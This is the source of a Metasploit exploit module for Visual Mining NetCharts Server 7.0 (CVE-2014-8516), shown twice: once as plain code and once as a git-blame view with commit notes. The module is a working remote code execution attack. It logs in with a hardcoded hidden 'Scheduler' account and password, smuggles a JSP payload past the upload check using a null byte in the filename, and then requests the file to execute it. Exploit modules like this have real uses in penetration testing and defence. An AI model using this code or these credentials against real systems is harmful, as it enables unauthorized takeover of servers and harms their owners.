metasploit-framework/modules/exploits/multi/http/visual_mining_netcharts_upl...

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  DEFAULT_USERNAME = 'Scheduler'
  DEFAULT_PASSWORD = '!@#$scheduler$#@!'
  SIGNATURE = 'was uploaded successfully and is now ready for installation'

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Visual Mining NetCharts Server Remote Code Execution',
      'Description' => %q{
        This module exploits multiple vulnerabilities in Visual Mining NetCharts.
        First, a lack of input validation in the administration console permits
        arbitrary jsp code upload to locations accessible later through the web
        service. Authentication is typically required, however a 'hidden' user is
        available by default (and non-editable). This user, named 'Scheduler',
        can only login to the console after any modification in the user
        database (a user is added, admin password is changed etc). If the
        'Scheduler' user isn't available valid credentials must be supplied. The
        default Admin password is Admin.
      },
      'Author'       =>
        [
          'sghctoma',    # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2014-8516'],
          ['ZDI', '14-372']
        ],
      'Privileged'  => true,
      'Platform'    => %w{ linux win },
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          ['Visual Mining NetCharts Server 7.0', {}]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 03 2014'))

    register_options(
      [
        Opt::RPORT(8001),
        OptString.new('USERNAME', [false, "The username to authenticate with"]),
        OptString.new('PASSWORD', [false, "The password to authenticate with"])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri('/', 'Admin', 'archive', 'upload.jsp'),
      'vars_get' => { 'mode' => 'getZip' },
      'authorization' => basic_auth(username, password)
    })

    if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
    print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")
    if upload(jsp_payload, payload.encoded)
      print_good("#{peer} - JSP payload uploaded successfully")
      register_file_for_cleanup("./webapps/Admin/archive/ArchiveCache/#{jsp_payload}")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
    end

    print_status("#{peer} - Executing payload...")
    execute(jsp_payload, 1)
  end

  def execute(jsp_name, time_out = 20)
    res = send_request_cgi({
      'uri'    => normalize_uri('/', 'Admin', 'archive', 'ArchiveCache', jsp_name),
      'method' => 'GET',
      'authorization' => basic_auth(username, password)
    }, time_out)

    res
  end

  def upload(file_name, contents)
    post_data = Rex::MIME::Message.new
    post_data.add_part(
      contents,
      'application/octet-stream',
      nil,
      "form-data; name=\"FILE1\"; filename=\"#{file_name}\x00Archive0101140101.zip\""
    )

    res = send_request_cgi({
      'uri'    => normalize_uri("/", 'Admin', 'archive', 'upload.jsp'),
      'method' => 'GET',
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'data'   => post_data.to_s,
      'vars_get' => { 'mode' => 'getZip' },
      'authorization' => basic_auth(username, password)
    })

    if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)
      true
    else
      false
    end
  end

  def username
    datastore['USERNAME'].blank? ? DEFAULT_USERNAME : datastore['USERNAME']
  end

  def password
    datastore['PASSWORD'].blank? ? DEFAULT_PASSWORD : datastore['PASSWORD']
  end
end
Add module for ZDI-14-372 2014-11-05 21:31:20 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::FileDropper`

			`DEFAULT_USERNAME = 'Scheduler'`
			`DEFAULT_PASSWORD = '!@#$scheduler$#@!'`
			`SIGNATURE = 'was uploaded successfully and is now ready for installation'`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Visual Mining NetCharts Server Remote Code Execution',`
			`'Description' => %q{`
touch up visual_mining_netcharts_upload 2014-11-07 04:50:20 +00:00			`This module exploits multiple vulnerabilities in Visual Mining NetCharts.`
			`First, a lack of input validation in the administration console permits`
			`arbitrary jsp code upload to locations accessible later through the web`
			`service. Authentication is typically required, however a 'hidden' user is`
Minor typos and grammar fixes 2014-11-13 20:48:23 +00:00			`available by default (and non-editable). This user, named 'Scheduler',`
touch up visual_mining_netcharts_upload 2014-11-07 04:50:20 +00:00			`can only login to the console after any modification in the user`
			`database (a user is added, admin password is changed etc). If the`
			`'Scheduler' user isn't available valid credentials must be supplied. The`
			`default Admin password is Admin.`
Add module for ZDI-14-372 2014-11-05 21:31:20 +00:00			`},`
			`'Author' =>`
			`[`
			`'sghctoma', # Vulnerability Discovery`
			`'juan vazquez' # Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`['CVE', '2014-8516'],`
			`['ZDI', '14-372']`
			`],`
			`'Privileged' => true,`
			`'Platform' => %w{ linux win },`
			`'Arch' => ARCH_JAVA,`
			`'Targets' =>`
			`[`
			`['Visual Mining NetCharts Server 7.0', {}]`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Nov 03 2014'))`

			`register_options(`
			`[`
			`Opt::RPORT(8001),`
			`OptString.new('USERNAME', [false, "The username to authenticate with"]),`
			`OptString.new('PASSWORD', [false, "The password to authenticate with"])`
			`], self.class)`
			`end`

			`def check`
			`res = send_request_cgi({`
			`'method' => 'GET',`
			`'uri' => normalize_uri('/', 'Admin', 'archive', 'upload.jsp'),`
			`'vars_get' => { 'mode' => 'getZip' },`
			`'authorization' => basic_auth(username, password)`
			`})`

			`if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)`
touch up visual_mining_netcharts_upload 2014-11-07 04:50:20 +00:00			`Exploit::CheckCode::Detected`
			`else`
			`Exploit::CheckCode::Safe`
Add module for ZDI-14-372 2014-11-05 21:31:20 +00:00			`end`
			`end`

			`def exploit`
			`jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"`
			`print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")`
			`if upload(jsp_payload, payload.encoded)`
			`print_good("#{peer} - JSP payload uploaded successfully")`
Fix clean up 2014-11-05 21:46:33 +00:00			`register_file_for_cleanup("./webapps/Admin/archive/ArchiveCache/#{jsp_payload}")`
Add module for ZDI-14-372 2014-11-05 21:31:20 +00:00			`else`
			`fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")`
			`end`

			`print_status("#{peer} - Executing payload...")`
			`execute(jsp_payload, 1)`
			`end`

			`def execute(jsp_name, time_out = 20)`
			`res = send_request_cgi({`
			`'uri' => normalize_uri('/', 'Admin', 'archive', 'ArchiveCache', jsp_name),`
			`'method' => 'GET',`
			`'authorization' => basic_auth(username, password)`
			`}, time_out)`

			`res`
			`end`

			`def upload(file_name, contents)`
			`post_data = Rex::MIME::Message.new`
			`post_data.add_part(`
			`contents,`
			`'application/octet-stream',`
			`nil,`
			`"form-data; name=\"FILE1\"; filename=\"#{file_name}\x00Archive0101140101.zip\""`
			`)`

			`res = send_request_cgi({`
			`'uri' => normalize_uri("/", 'Admin', 'archive', 'upload.jsp'),`
			`'method' => 'GET',`
			`'ctype' => "multipart/form-data; boundary=#{post_data.bound}",`
			`'data' => post_data.to_s,`
			`'vars_get' => { 'mode' => 'getZip' },`
			`'authorization' => basic_auth(username, password)`
			`})`

			`if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)`
touch up visual_mining_netcharts_upload 2014-11-07 04:50:20 +00:00			`true`
			`else`
			`false`
Add module for ZDI-14-372 2014-11-05 21:31:20 +00:00			`end`
			`end`

			`def username`
touch up visual_mining_netcharts_upload 2014-11-07 04:50:20 +00:00			`datastore['USERNAME'].blank? ? DEFAULT_USERNAME : datastore['USERNAME']`
Add module for ZDI-14-372 2014-11-05 21:31:20 +00:00			`end`

			`def password`
touch up visual_mining_netcharts_upload 2014-11-07 04:50:20 +00:00			`datastore['PASSWORD'].blank? ? DEFAULT_PASSWORD : datastore['PASSWORD']`
Add module for ZDI-14-372 2014-11-05 21:31:20 +00:00			`end`
			`end`